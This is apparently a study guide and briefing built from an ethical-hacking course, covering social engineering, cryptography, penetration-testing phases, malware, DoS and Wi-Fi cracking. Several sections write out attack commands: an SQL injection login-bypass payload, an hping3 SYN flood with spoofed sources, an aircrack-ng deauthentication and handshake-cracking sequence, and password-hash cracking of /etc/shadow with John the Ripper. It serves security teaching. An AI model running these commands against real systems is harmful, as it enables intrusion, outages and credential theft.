    • Uncertified Websites: Websites that do not have valid security certificates, potentially indicating a risk.
    • Vulnerability: A weakness in a system that can be exploited by a threat.
    • Vulnerability Assessment: The process of identifying and quantifying security vulnerabilities in a system.
    • Vulnerability Scanner: An automated tool used to identify potential vulnerabilities in computer systems and networks.
    • VPN (Virtual Private Network): A network that extends a private network across a public network, and enables users to send and receive data across shared or public networks as if their computing devices were directly connected to the private network.
    • Web Server: A computer system that serves web pages and related content to clients.
    • White Hat Hacker (Ethical Hacker): A security expert who uses hacking skills to identify security vulnerabilities in systems with the permission of the owner, with the goal of improving security.
    • Wi-Fi Hacking Tools: Software and techniques used to exploit vulnerabilities in wireless networks.
    • Wireshark: A free and open-source packet analyzer used for network troubleshooting and analysis.
    • WPScan: A free, non-commercial vulnerability scanner for WordPress websites.
    • Zenmap: The official Nmap Security Scanner GUI.

    Detailed Briefing Document: Review of Cyber Security and Ethical Hacking Concepts

    Introduction:

    This briefing document summarizes the main themes, important ideas, and facts presented in the provided source material (“01.pdf”). The document covers a range of cybersecurity topics, from social engineering attacks and cryptography to ethical hacking methodologies, network security measures, malware, and practical demonstrations of penetration testing using tools like Kali Linux. Quotes from the original source are included to highlight key concepts.

    1. Social Engineering Attacks:

    The source emphasizes the human element as a significant vulnerability in security. Attackers often exploit natural human tendencies like curiosity and greed to gain access to systems or information.

    • Exploiting Trust: Attackers may pose as legitimate entities to elicit sensitive information. “if a person can interact with you let’s say they’re trying to take a survey and they approach you for a feedback on a particular product that you have been utilizing and they ask you these questions you wouldn’t think twice before giving those answers as long as the request sounds legitimate to us we are able to justify that request we do answer those queries so it’s upon us to verify the authenticity of the request coming in before we answer it.”
    • Phishing: This involves fraudulent emails appearing from trusted sources. “fishing as discussed would be fraudulent emails which appear to be coming from a trusted source so email spoofing comes into mind fake websites and so on so forth.”
    • Exploiting Curiosity: Leaving infected devices like USB drives in public places can lure unsuspecting individuals. “there’s so many physical attacks where hackers just keep pen drives lying around in a parking lot now this is a open generic attack whoever falls victim will fall victim so if I just throw around a few USBs in the parking lot obviously with Trojans implemented on them some people who are curious or who are looking for a couple of freebies might take up those pen drives plug them in their computers to see what data is on the pen drives at the same time once they plug in there those pen drives on their computers the virus or the Trojan would get infected and cause harm to their machine.”
    • Exploiting Greed: Scams like Nigerian frauds and fake lotteries prey on individuals’ desire for quick financial gain. “exploiting human greed we just talked about the Nigerian frauds and the lotteryies those kind of attacks the fake money-making gimmicks now basically this is where you prey upon the person’s uh greed kicking in and they clicking on those links in order to uh get that money that has been promised to them in that email.”

    2. Cryptography:

    Encryption is presented as a fundamental mechanism for data privacy and security.

    • Encryption Process: Cryptography involves scrambling data using algorithms to make it unreadable without the correct key. “one of the safest mechanism to keep data private and to keep yourself secure is using encryption now encryption can happen through cryptography what is cryptography cryptography is the art of scrambling data using a particular algorithm so that the data becomes unreadable to the normal user the only person with the key to unscramble that data would be able to unscramble it and make sense out of that data so we’re just making it unreadable or non-readable by using a particular key or a particular algorithm and then we’re going to send the key to the end user the end user using the uh same key would then decrypt that data if anybody compromises that data while it is being sent over the network since it is encrypted they would not be able to read it.”
    • Cipher and Decryption: Encrypted data is called a cipher. Decryption is the reverse process using the key. The source illustrates a simple substitution cipher. “the encrypted message is also known as a cipher the decryption is just the other way around where you know the key now and you can now figure out what that e correspondent to by going back three characters in the alphabet.”
    • Cryptanalysis: This is the process of decrypting a message without knowing the secret key. “decryption without the use of a secret key that is known as a crypt analysis crypto analysis is the reversing of an algorithm to figure out what the decryption was without using a key.”
    • Cryptanalysis Techniques: The source mentions three common techniques:
    • Brute Force Attack: Trying every possible key combination. “a brute force attack is trying every combination permutation and combination of the key to figure out what the key was it is 100% successful but may take a lot of time.”
    • Dictionary Attack: Using a list of potential keys (words). “a dictionary attack is where you have created a list of possible encryption mechanisms a list of possible cracks and then you try to figure out whether those cracks work or not.”
    • Rainbow Table Attack: Comparing encrypted text with pre-computed tables of hashes. “rainbow tables are where you have an encrypted text in hand and you’re trying to figure out uh the similarities between the text that you have and the encrypted data that you wanted to decrypt in the first place.”
    • Spam Mimic: The source demonstrates a tool that encodes messages into seemingly unrelated spam emails for obfuscation. “to begin with the demo of cryptography we are on a website called spammimic.com which will help us scramble the message that we created into a completely format which would be unrelated to the topic at hand so if I say I want to encode a message turn a short message into spam so what this does is want to send across a secret message you type in the secret message a short one and it will convert that into a spam mail you send it across so whoever is reading that spam mail would never get an idea of the embedded message within it.”
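
    The three-character shift described above is a Caesar cipher. As a hedged illustration (not from the source), it can be reproduced with the standard Unix tr utility:

        # Encrypt: shift every letter forward by 3 (key = 3)
        echo "attack at dawn" | tr 'a-z' 'd-za-c'     # -> dwwdfn dw gdzq

        # Decrypt: shift back by 3 using the same key
        echo "dwwdfn dw gdzq" | tr 'd-za-c' 'a-z'     # -> attack at dawn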

    3. Ethical Hacking:

    The source differentiates between ethical and malicious hackers and outlines the responsibilities of an ethical hacker.

    • White Hat vs. Black Hat: Security experts who work defensively are “white hat hackers,” while malicious attackers are “black hats.” “vulnerabilities and we report them back to the victim or to the client and help them uh patch those vulnerabilities that’s the main difference between a white hat and a black hat so security experts are normally termed as white hat hackers malicious hackers are termed as black hats.”
    • Responsibilities of an Ethical Hacker: These include:
    • Identifying and testing vulnerabilities. “first and foremost you have to create scripts test for vulnerabilities first have to identify those in the first place so there’s a vulnerability assessment identifying those vulnerabilities and then you’re going to test them to see the validity and the complexity of those vulnerabilities.”
    • Developing security tools and configurations. “your one of your responsibilities would be to develop tools to increase security as well or to configure security in such a way that it would be difficult to breach.”
    • Performing risk assessments. “performing risk assessment now what is a risk risk is a threat that is posed to an organization by a possibility of getting hacked… I do a risk assessment to identify which vulnerability is critical would have the most impact on the client and what would be the repercussions if those vulnerabilities actually get exploited.”
    • Setting up security policies. “another responsibility of the ethical hacker is to set up policies in such a way that it becomes difficult for hackers to get access to devices or to protected data.”
    • Training staff on network security. “and finally train the staff for network security so uh we got a lot of employees in an organization we need to train the staff of what is allowed and what is not allowed how to keep themselves secure so that they don’t get compromised thus becoming a vulnerability themselves to the organization.”
    • Implementing administrative policies like password policies. “the policies that we have talked about are administrative policies to govern the employees of the organization for example password policies most of the organizations will have a tough password policy where they say you have to create a password that meets a certain level of complexity before that can be accepted and till you create that password you’re not allowed to log in or you’re not allowed to register.”

    4. Penetration Testing:

    Penetration testing is a focused effort to exploit identified vulnerabilities in information systems.

    • Vulnerability Assessment as a Precursor: It involves scanning for potential flaws before attempting penetration. “now for penetration testing there is a phase called vulnerability assessment that happens before this vulnerability assessment is nothing but running a scanning tool to identify a list of potential flaws or vulnerabilities within the organization.”
    • Focus on Exploitation: Penetration testing aims to actively breach security defenses. “this is the part of ethical hacking where it specifically focuses on penetration only of the information systems… the essence of penetration testing is to penetrate information systems using various attacks.”
    • Attack Vectors: These can include phishing, password cracking, Denial of Service (DoS), and exploiting other identified vulnerabilities. “the attacks could be anything like a phishing attack a password cracking attack a denial of service attack or any other vulnerabilities that you have identified uh during the vulnerability scan.”

    5. Kali Linux:

    Kali Linux is highlighted as a popular operating system for both ethical and malicious hackers due to its pre-installed security tools.

    • Tool-Rich Distribution: It contains over 600 tools for penetration testing and security auditing. “what is Kali Linux and why is it used kali Linux is an operating system oftenly used by hackers and ethical hackers both because of the tool sets that the operating system contains it is a operating system created by professionals with a lot of embedded tools it is a DVN based operating system with advanced penetration testing and security auditing features there are more than 600 plus odd tools on that operating system that can help you leverage any of the attacks.”
    • Versatile Capabilities: These tools support various security tasks like man-in-the-middle attacks, sniffing, password cracking, computer forensics, reverse engineering, and information gathering. “contains like I said a hundred of hundreds of tools that are used for various information security tasks like uh computer forensics re reverse engineering information finding even uh getting access to different machines and then uh creating viruses worms to anything that you will 600 plus tools in the Kali Linux operating system.”
    • Key Features: Kali Linux is open-source, free, regularly updated, customizable, supports wireless network cards and multiple languages, and allows for creating custom attacking scripts and exploits.

    6. Phases of Penetration Testing:

    The source outlines five key phases of a penetration test:

    • Reconnaissance (Information Gathering): This crucial phase involves collecting as much information as possible about the target. “the first one is the reconnaissance phase also known as the information gathering phase this is the most important phase for any hacker this is where the hacker or the ethical hacker if you will will gather as much information about the targets victim or vice versa the vict the victim right… for example you want to find out the IP addresses the domains subdomains the network architecture that is being utilized you want to identify operating systems that are being utilized.”
    • Scanning: Using tools to identify open ports, services, and potential vulnerabilities based on the information gathered. “the second phase is the scanning phase once you have gathered enough information about the target you would then start probing the network or the devices that are within the scope of your test to identify open ports what services are running on those ports what operating systems and versions are being utilized by those machines.”
    • Gaining Access (Exploitation): Attempting to exploit identified vulnerabilities to gain unauthorized access to the system. “the third phase is gaining access based on the information gathered in the first two phases and the vulnerabilities that you have identified in the second phase you would then try to exploit those vulnerabilities to gain access to the system or the application this could involve using various techniques such as exploiting software flaws, weak passwords, or social engineering tactics.”
    • Maintaining Access (Post-Exploitation): Once access is gained, the focus shifts to maintaining that access and potentially escalating privileges. “the fourth phase is maintaining access once you have gained access to a system or an application you would want to maintain that access for a certain period of time to gather more information or to perform further actions this could involve installing back doors, creating new accounts, or pivoting to other systems within the network.”
    • Reporting: Documenting the findings, vulnerabilities exploited, and recommendations for remediation. “the final phase is reporting once the penetration test is complete you would document all of your findings, the vulnerabilities that you have exploited, the impact of those vulnerabilities, and your recommendations for remediation this report is then provided to the client to help them improve their security posture.”
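
    As an illustration of the scanning phase, a typical Nmap invocation might look like this (the target address is a placeholder; the source demonstrates scanning through Zenmap, Nmap’s GUI):

        # Detect services and versions on the most common ports
        nmap -sV 192.168.56.101

        # Scan all 65535 TCP ports and attempt OS detection (needs root)
        sudo nmap -sV -O -p- 192.168.56.101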

    7. Vulnerability Assessment Examples:

    The source provides demonstrations of common vulnerabilities:

    • SQL Injection: This attack exploits vulnerabilities in how web applications handle user input to interact with databases. By injecting malicious SQL code, an attacker can bypass authentication or extract sensitive data. The demonstration shows how a simple SQL injection can bypass a login form (spoken as “single quote or 1= 1 space – space”, i.e., the payload ' OR 1=1 -- ) and how a different injection can dump database contents in a user lookup form (“single quote or 1= 1 space”, i.e., ' OR 1=1 ). The source emphasizes that “the vulnerability will always lie in the application it is the developer’s prerogative of how to develop the application how to configure it to prevent SQL injection queries from happening.” Different types of SQL injection are mentioned: inband (error-based, union-based), blind (boolean-based, time-based), and out-of-band. A request-level sketch follows this list.
    • Password Cracking: The demonstration uses the Cain and Abel tool (transcribed as “Kane enable” in the source) on a Windows 7 machine to extract password hashes and attempts to crack them using a brute-force attack. It highlights how Windows stores password hashes and the time-consuming nature of brute-force attacks.
    • Shellshock Vulnerability: The source demonstrates exploiting the Shellshock vulnerability on a Linux web server using Kali Linux and Metasploit. This involves using reconnaissance tools like Zenmap and Sparta to identify the target and the vulnerability, and then using Metasploit to execute a payload and gain remote access (“meterpreter session”).
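
    To make the login-bypass demonstration concrete, the minimal sketch below shows how the quoted payload changes the query a naive application would build by string concatenation. The table and column names are hypothetical; the point is the always-true OR 1=1 condition and the -- comment that discards the rest of the query.

    ```bash
    # Hypothetical query template a vulnerable app might build by concatenation:
    #   SELECT * FROM users WHERE name = '<input>' AND pass = '<input>';
    payload="' or 1=1 -- -"
    echo "SELECT * FROM users WHERE name = '${payload}' AND pass = 'anything';"
    # Output: SELECT * FROM users WHERE name = '' or 1=1 -- -' AND pass = 'anything';
    # The injected quote closes the string, "or 1=1" is always true, and "--"
    # comments out the password check, so the login succeeds without credentials.
    ```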

    8. Network Security Measures:

    The document touches upon several network security technologies:

    • VPN (Virtual Private Network): VPNs encrypt internet traffic and mask the user’s IP address, enhancing privacy and security, especially on public Wi-Fi. The example of Jude at the airport illustrates the risks of using public Wi-Fi without a VPN, where a hacker could intercept her bank transaction details. “bank officials advise her to use a VPN for future transactions especially when connecting to an open or public network.” The process involves the user’s computer connecting to the ISP, then to the VPN server (which encrypts the data and provides a new IP address), and finally to the target server.
    • Tor (The Onion Router): Tor is presented as a network that anonymizes internet traffic by routing it through multiple relays. It hides the user’s IP address and location. The demonstration shows how to use the Tor Browser, check the apparent IP address and location, and access “.onion” websites (hidden services). “the Tor browser is a very effective way of anonymizing your internet activity. it works by routing your traffic through multiple relays across the world, encrypting it at each step and making it very difficult to trace your original IP address or your location.”
    • Firewalls: Firewalls act as virtual walls, filtering incoming and outgoing network traffic based on predefined rules. They protect devices from unauthorized access and malicious data packets. “firewalls are security devices that filter the incoming and outgoing traffic within a private network… the firewall works like a gatekeeper at your computer’s entry point which only welcomes incoming traffic that it has been configured to accept.” Different types of firewalls are mentioned: packet filtering, stateful inspection, and proxy firewalls; a minimal rule-set sketch follows this list.
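
    As a concrete illustration of the packet-filtering and stateful-inspection firewall types mentioned above, here is a minimal iptables rule set. The subnet and port are placeholder values, not configuration from the source.

    ```bash
    # Allow return traffic for connections we initiated (stateful inspection)
    sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
    # Allow SSH, but only from the trusted LAN (packet filtering by port + source)
    sudo iptables -A INPUT -p tcp --dport 22 -s 192.168.1.0/24 -j ACCEPT
    # Allow loopback traffic
    sudo iptables -A INPUT -i lo -j ACCEPT
    # Default policy: drop everything else (the "gatekeeper" behavior)
    sudo iptables -P INPUT DROP
    ```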

    9. Malware:

    The source discusses different types of malware:

    • Viruses: These are malicious programs that attach themselves to other files and replicate. Types discussed include boot sector viruses (affecting system startup), macro viruses (embedded in documents), and direct action viruses (activate upon execution and then exit). “for the first part we saw the main objective of the virus is to harm the data and information in a system… viruses have the ability to replicate themselves to harm multiple files, whereas a Trojan does not have the replication ability.” Detection methods include system slowdowns, application freezes, data corruption, unexpected logouts, and frequent crashes. The MyDoom virus is mentioned as a famous example.
    • Trojans: Trojans disguise themselves as legitimate software but perform malicious actions once executed. Types discussed include backdoor Trojans (providing remote access), click fraud Trojans (generating fraudulent clicks), and ransomware Trojans (blocking access and demanding payment). “for the Trojan we have stealing of data, files, and information… Trojan horses are remotely accessed, and lastly, viruses have the ability to replicate themselves to harm multiple files whereas a Trojan does not have the replication ability.” Detection includes frequent crashes, slow reaction times, random pop-ups, and changes in system applications and desktop appearance. The Emotet Trojan is mentioned for financial theft.
    • Botnets: These are networks of infected devices (bots) controlled remotely by an attacker (bot herder) to perform large-scale attacks like data theft, server failures, malware propagation, and DoS attacks. The creation process involves preparing the botnet army (infecting devices), establishing connection to the control server, and launching the attack. Architectures include client-server and peer-to-peer models. The Mirai and Zeus botnets are given as examples.

    10. Denial of Service (DoS) Attacks:

    DoS attacks aim to disrupt services by overwhelming a target with traffic, making it unavailable to legitimate users. “a denial of service attack is an attack that aims to make a computer or a network resource unavailable to its intended users by disrupting the service of a host connected to the internet.” The source explains that Distributed Denial of Service (DDoS) attacks involve multiple compromised systems launching attacks simultaneously. Mitigation techniques include over-provisioning bandwidth and using a Content Delivery Network (CDN). A demonstration using the hping3 tool from Parrot Security to flood a Linux Lite virtual machine with SYN packets showcases the impact of a DoS attack; a sketch of that kind of command appears below.
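
    The source’s demonstration uses hping3 to generate the SYN flood. A command along the lines of the sketch below would reproduce that kind of test in a lab; the target IP is a placeholder for an isolated virtual machine, and this should never be pointed at systems you do not own.

    ```bash
    # SYN flood against a lab VM (authorized, isolated environments only):
    #   -S             send TCP SYN packets
    #   -p 80          target port 80
    #   --flood        send as fast as possible, do not wait for replies
    #   --rand-source  spoof a random source address on every packet
    sudo hping3 -S -p 80 --flood --rand-source 192.168.56.102
    ```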

    11. Wi-Fi Hacking:

    The source demonstrates capturing Wi-Fi handshakes and attempting to crack passwords using tools within Kali Linux (likely the Aircrack-ng suite; the tool transcribed as “Air Garden” is almost certainly airgeddon, a multi-use bash script). The process involves using tools to monitor wireless networks, capture the WPA/WPA2 handshake during authentication, and then using brute-force or dictionary attacks to try to crack the handshake file and reveal the Wi-Fi password; a sketch of the standard workflow follows.
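
    The source names the tools only loosely, so the following is a sketch of the standard Aircrack-ng workflow for the capture-and-crack process it describes. The interface name, BSSID, channel, and wordlist path are placeholders, and this must only be run against a network you own or are authorized to audit.

    ```bash
    # 1. Put the wireless card into monitor mode (interface becomes e.g. wlan0mon)
    sudo airmon-ng start wlan0
    # 2. Survey nearby networks to find the target BSSID and channel
    sudo airodump-ng wlan0mon
    # 3. Capture traffic on the target's channel, writing to capture-01.cap
    sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
    # 4. (Optional) Deauthenticate a client so it reconnects and the handshake is caught
    sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
    # 5. Run a dictionary attack against the captured WPA/WPA2 handshake
    aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF capture-01.cap
    ```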

    12. Security Tools (Beyond Kali Specifics):

    The source briefly introduces several key security tools:

    • Wireshark: A network protocol analyzer used for capturing and analyzing network traffic at a microscopic level, aiding in real-time or offline network analysis and identifying traffic patterns. “Wireshark is a popular open-source tool to capture network packets and convert them from binary into a human-readable format. it provides every single detail of the organization’s network infrastructure.”
    • Airgeddon (transcribed as “Air Garden” in the source): Described as a multi-use bash script for Linux systems to hack and audit wireless networks, capable of launching DoS attacks and supporting various Wi-Fi hacking methods.
    • John the Ripper: An open-source password security auditing and recovery tool supporting numerous hash and cipher types, utilizing dictionary attacks and brute-forcing (a usage sketch follows this list). “john the Ripper is an open-source password security auditing and password recovery tool available for many operating systems. john the Ripper Jumbo supports hundreds of hash and cipher types, including for user passwords of operating systems, web apps, groupware, database servers, network traffic captures, encrypted private keys, file systems, and document files.”
    • Nmap (Network Mapper): A network scanning tool using IP packets to identify devices, open ports, services, and operating systems on a network.
    • Burp Suite: A powerful tool for web application security testing, used for configuring proxies, intercepting and inspecting traffic, and identifying vulnerabilities.
    • Metasploit Framework: A penetration testing tool used for exploit development and execution against identified vulnerabilities, providing a platform for launching attacks and gaining access to systems.
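
    As a small illustration of the password-auditing workflow John the Ripper supports, the sketch below shows a typical dictionary attack on Linux password hashes. The file names are placeholders and the wordlist path assumes a Kali-style layout.

    ```bash
    # Combine account info and hashes into a format John understands (Linux)
    sudo unshadow /etc/passwd /etc/shadow > hashes.txt
    # Dictionary attack using the classic rockyou wordlist
    john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
    # Display any passwords cracked so far
    john --show hashes.txt
    ```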

    13. Cryptography Algorithms in Detail:

    The source delves deeper into specific cryptographic algorithms:

    • Hashing: A process that creates a fixed-size output (hash value) from variable-sized input data. Hash functions are generally not reversible without extensive brute-force efforts and are useful for storing passwords securely by comparing hash values instead of plain text. (A command-line sketch of hashing and symmetric encryption follows this list.)
    • Symmetric Cryptography: Uses the same key for both encryption and decryption.
    • DES (Data Encryption Standard): An older symmetric block cipher with a 56-bit key. Despite its past prominence, its short key length makes it vulnerable to brute-force attacks. The source explains the Feistel structure it uses, involving multiple rounds of substitution and permutation. Different modes of operation (ECB, CBC, CFB, OFB, CTR/Counter) are also discussed. Its dominance ended in 2002, when AES replaced it as the standard.
    • AES (Advanced Encryption Standard): A symmetric block cipher with 128-bit block size and key sizes of 128, 192, or 256 bits. It became the NIST standard in 2002 due to DES’s short key length.
    • Asymmetric Cryptography: Uses separate keys for encryption (public key) and decryption (private key).
    • RSA: A public-key algorithm used both for encrypting and decrypting exchanged data and for digital signatures. The source explains the key generation process involving two large prime numbers, and the encryption and decryption formulas (in standard RSA notation, ciphertext c = m^e mod n and plaintext m = c^d mod n, where n is the product of the two primes).
    • Digital Signatures: Used to verify the authenticity and integrity of data.
    • DSA (Digital Signature Algorithm): A public key signature algorithm. The source outlines the key generation, signature generation (using a hash function and random integer), and signature verification processes. It highlights DSA’s robustness and faster key generation compared to RSA.
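
    To ground the hashing and symmetric-encryption concepts above, here is a minimal command-line sketch using coreutils and OpenSSL; the file names are placeholders, and the flags shown are one common choice rather than anything prescribed by the source.

    ```bash
    # Hashing: a fixed-size digest from variable-sized input (not reversible)
    echo -n "hello" | sha256sum      # same input always yields the same hash
    echo -n "hello!" | sha256sum     # tiny change in input -> completely different hash

    # Symmetric encryption (AES-256-CBC): the same passphrase encrypts and decrypts
    openssl enc -aes-256-cbc -salt -pbkdf2 -in secret.txt -out secret.enc
    openssl enc -d -aes-256-cbc -pbkdf2 -in secret.enc -out secret.dec
    ```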

    14. Ethical Considerations and AI in Cyber Security:

    The document touches upon the ethical use of hacking techniques, emphasizing the importance of permission and controlled environments. It also introduces “HackerGPT,” an AI language model trained in cybersecurity, capable of answering questions, providing code snippets for tasks like port scanning and log monitoring, and explaining security concepts like SQL injection and Burp Suite configuration. This suggests the growing role of AI in both offensive and defensive cybersecurity practices.

    15. Penetration Testing Methodologies (Types):

    The source categorizes penetration testing based on the tester’s knowledge of the system:

    • Black Box Testing: The tester has no prior knowledge, simulating an external attacker.
    • White Box Testing: The tester has full access to system details, simulating an insider threat or a highly informed attacker.
    • Gray Box Testing: The tester has partial knowledge, such as user credentials or limited architecture details.

    16. Installation of Security Tools on Kali Linux:

    The document provides a practical guide to installing essential penetration testing tools on Kali Linux using the sudo apt install command, as sketched below. Tools mentioned include Nmap, Whois, Dig (DNS utilities), Nikto, WPScan, OpenVAS (Greenbone Vulnerability Manager), and Metasploit Framework. It also demonstrates checking the versions of some of these tools.
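
    A minimal sketch of that installation step, assuming current Kali package names (for example, OpenVAS is packaged as gvm and Dig ships in dnsutils; verify the names against your release):

    ```bash
    sudo apt update
    # Install the tools mentioned in the source (package names may vary by release)
    sudo apt install -y nmap whois dnsutils nikto wpscan gvm metasploit-framework
    # Spot-check a few installed versions
    nmap --version
    wpscan --version
    msfconsole --version
    ```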

    Conclusion:

    The provided source material offers a comprehensive overview of various cybersecurity concepts, ranging from social engineering tactics to advanced cryptographic algorithms and practical penetration testing methodologies. It highlights the importance of understanding both offensive and defensive security techniques and introduces the role of specialized tools like Kali Linux and the emerging influence of AI in the field. The inclusion of practical demonstrations and tool installation guides provides a valuable introduction to hands-on cybersecurity practices, albeit within ethical and controlled environments.

    General Cyber Security Concepts

    • What are some common social engineering tactics used in cyber attacks? Social engineering exploits human psychology to gain access to systems or information. Common tactics include phishing (fraudulent emails from trusted sources), exploiting curiosity (leaving infected USB drives in public places), and exploiting greed (Nigerian scams, fake lotteries). Attackers often impersonate legitimate entities or create seemingly plausible scenarios to trick individuals into divulging sensitive data or performing malicious actions. Verifying the authenticity of requests and being cautious about unsolicited offers are crucial defenses against these tactics.
    • What is encryption and why is it important for data security? Encryption is the process of scrambling data using a specific algorithm (cryptography) so that it becomes unreadable to unauthorized users. The original data can only be restored (decrypted) by someone possessing the correct key. Encryption is a fundamental security mechanism for keeping data private and secure, especially when transmitted over networks. Even if data is intercepted, without the decryption key, it remains nonsensical to the attacker. Various algorithms exist, and their complexity determines the difficulty of breaking the encryption.
    • What is cryptanalysis and what are some common techniques used in it? Cryptanalysis is the process of decrypting encrypted data (ciphertext) without knowing the secret key. It involves reversing the encryption algorithm to figure out the original message. Common cryptanalysis techniques include brute-force attacks (trying every possible key combination), dictionary attacks (using a list of potential passwords or keys), and rainbow table attacks (comparing ciphertext with pre-calculated hashes to find matches). The success and time required for these techniques vary depending on the strength of the encryption and the resources available to the attacker.
    • What are the differences between white hat, black hat, and gray hat hackers? Hackers are often categorized by their ethical intentions. White hat hackers (ethical hackers) use their skills to identify vulnerabilities in systems and networks with the permission of the owner, with the goal of improving security. They perform penetration testing and report findings to help organizations patch weaknesses. Black hat hackers, on the other hand, use their skills for malicious purposes, such as stealing data, disrupting services, or financial gain, without authorization. Gray hat hackers operate in a less defined area; they may sometimes act without permission but without malicious intent, often disclosing vulnerabilities they find publicly or to the affected organization.

    Ethical Hacking and Penetration Testing

    • What is penetration testing and what are the typical phases involved? Penetration testing is a specific type of ethical hacking that focuses on actively attempting to penetrate information systems using various attack methods. The goal is to identify and exploit vulnerabilities to assess the security posture of a system or network. The typical phases of penetration testing include:
    1. Reconnaissance (Information Gathering): Collecting as much information as possible about the target, including IP addresses, domains, network architecture, and operating systems.
    2. Scanning: Using tools to identify open ports, services running, and potential vulnerabilities based on the information gathered.
    3. Exploitation: Attempting to exploit the identified vulnerabilities to gain unauthorized access to the system or data.
    4. Post-Exploitation: Once access is gained, exploring the compromised system to understand the extent of the breach and potential impact.
    5. Reporting: Documenting the findings, including the vulnerabilities identified, the methods used to exploit them, and recommendations for remediation.
    • What is SQL injection and how can it be exploited? SQL injection is a web application vulnerability that allows an attacker to inject malicious SQL code into an application’s database queries. This can happen when user input is not properly sanitized before being used in a SQL query. By crafting malformed queries, attackers can bypass authentication, extract sensitive data, modify database content, or even execute arbitrary commands on the database server. Exploitation often involves using special SQL characters and operators (like single quotes, OR, 1=1) in input fields to manipulate the logic of the queries sent to the database. Different types of SQL injection attacks exist, including in-band (error-based and union-based), blind (boolean-based and time-based), and out-of-band.
    • What is a Denial of Service (DoS) attack and how can it impact a system or network? A Denial of Service (DoS) attack is an attempt to make a machine or network resource unavailable to its intended users by disrupting the service of a host connected to the internet. This is typically achieved by flooding the target with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled. A Distributed Denial of Service (DDoS) attack uses multiple compromised computer systems to attack a single target, amplifying the impact. DoS/DDoS attacks can lead to service outages, financial losses, and reputational damage. Mitigation strategies include over-provisioning bandwidth, using Content Delivery Networks (CDNs), and implementing traffic filtering and rate limiting.
    • What is Wi-Fi hacking and what tools are commonly used for it? Wi-Fi hacking refers to the process of attempting to gain unauthorized access to a wireless network. Common tools used for this purpose include Aircrack-ng (a suite of tools for packet sniffing, password cracking, and more), and tools within Kali Linux. Techniques often involve capturing the WPA/WPA2 handshake (a four-way exchange that occurs when a device connects to a Wi-Fi network) and then attempting to crack the password offline using brute-force or dictionary attacks. These tools can also be used for legitimate security auditing of wireless networks to identify vulnerabilities. It’s crucial to have permission before attempting to audit or penetrate any wireless network.

    Cyber Security Fundamentals: A Comprehensive Overview

    Cyber security fundamentals revolve around the essential principles and practices designed to protect computer systems, networks, and digital information from unauthorized access, use, disclosure, disruption, modification, or destruction. In today’s digital world, where cyber threats are pervasive, cyber security has become more critical than ever.

    Here are some fundamental aspects of cyber security discussed in the sources:

    • The Importance of Cyber Security: With the increasing number of cyber threats, safeguarding networks, applications, and data is a top priority. The demand for skilled cyber security professionals, particularly ethical hackers, is expected to grow significantly. Companies across various industries need these professionals to secure their systems. The potential financial impact of cyber attacks, such as ransomware attacks, which cost institutions billions of dollars, underscores the necessity of robust cyber security measures.
    • Ethical Hacking as a Core Component: Ethical hacking involves using the same tools and techniques as malicious hackers to identify and fix security vulnerabilities before they can be exploited. Ethical hackers, also known as white hat hackers, work with the permission of the system owner to stress-test their platforms and strengthen security. This proactive approach helps organizations prevent data breaches and save billions of dollars.
    • Understanding Threat Actors: It’s crucial to understand the different types of hackers.
    • Black hat hackers exploit security vulnerabilities for monetary gain, often stealing or destroying data. They operate with malicious intent and try to remain anonymous.
    • White hat hackers (ethical hackers) use their skills to identify and remedy security flaws to help organizations improve their security posture. They are authorized to act on the company’s behalf.
    • Grey hat hackers are a blend of both, who may snoop on systems without consent but inform the owner of vulnerabilities, sometimes for a fee.
    • Script kiddies rely on existing hacking tools without much technical understanding.
    • Nation-sponsored hackers are employed by governments for espionage and other purposes.
    • Core Concepts: A thorough introduction to cyber security involves learning the basic terminology, different types of threats, how these threats work, and the fundamental working principles.
    • Networking Fundamentals: A strong grasp of how the internet works, including operating systems, TCP/IP, OSI model, routing, and switching, is absolutely essential for entering the field of cyber security. Understanding network protocols (e.g., TCP/IP), network security principles, and firewall configurations is fundamental for identifying vulnerabilities.
    • Operating Systems Proficiency: Proficiency in various operating systems like Windows, Linux, and macOS is crucial. It allows cyber security professionals to safeguard the fault lines across different platforms as they directly interact with these systems daily.
    • Cryptography: Knowledge of cryptography, including encryption, decryption, cryptographic algorithms, and protocols, is very important in cyber security. Cryptography is the science of securing data through encryption to prevent unauthorized access. Techniques like AES encryption are used to scramble data, making it difficult for attackers to crack.
    • Risk Management: Understanding risk assessment, mitigation strategies, and compliance frameworks like GDPR and HIPAA is a key aspect of cyber security.
    • Cyber Security Laws and Ethics: Awareness of legal and ethical considerations in cyber security is also fundamental.
    • Essential Security Technologies: Familiarity with security technologies such as firewalls, intrusion detection and prevention systems (IDPS), antivirus software, and endpoint security is necessary. Firewalls monitor network traffic and block unauthorized access based on security rules.
    • Vulnerability Assessment and Penetration Testing: Hands-on experience with tools like Nessus, Metasploit, NMAP, and Burp Suite is crucial for identifying and exploiting vulnerabilities to improve security. Penetration testing simulates real-world attacks to uncover weaknesses in systems and networks.
    • Incident Response: Understanding security operations, incident response, threat hunting, log analysis, and Security Information and Event Management (SIEM) is vital for handling security breaches. Collecting system logs is a critical part of incident response and forensic analysis.
    • Secure Coding Practices: Knowledge of secure software development practices and common vulnerabilities like OWASP Top 10 is important for preventing security flaws in applications.
    • Staying Updated: The field of cyber security is constantly evolving, so staying updated with the latest threats and attack methodologies is crucial for effective defense.

    In summary, cyber security fundamentals encompass a broad range of technical knowledge, ethical considerations, and practical skills aimed at protecting digital assets from a growing landscape of cyber threats. A strong foundation in networking, operating systems, cryptography, and ethical hacking principles forms the bedrock of a successful career in this critical field.

    Understanding Ethical Hacking Principles and Practices

    Ethical hacking encompasses a range of concepts centered around proactively identifying and mitigating security vulnerabilities in computer systems, networks, and applications with the permission of the owner. It involves using the same tools and techniques as malicious hackers, but with the intent to improve security rather than to cause harm or personal gain.

    Here are some key ethical hacking concepts discussed in the sources:

    • Definition and Purpose: Ethical hacking is the process of taking security measures to safeguard data and networks from malicious cyber attacks. Ethical hackers use every tool at their disposal to try and breach security barriers and find potential vulnerabilities. The core purpose is to discover weaknesses or vulnerabilities in information systems in a legal and ethical manner. By identifying these flaws, ethical hackers help organizations to strengthen their defenses and protect against real cyber threats.
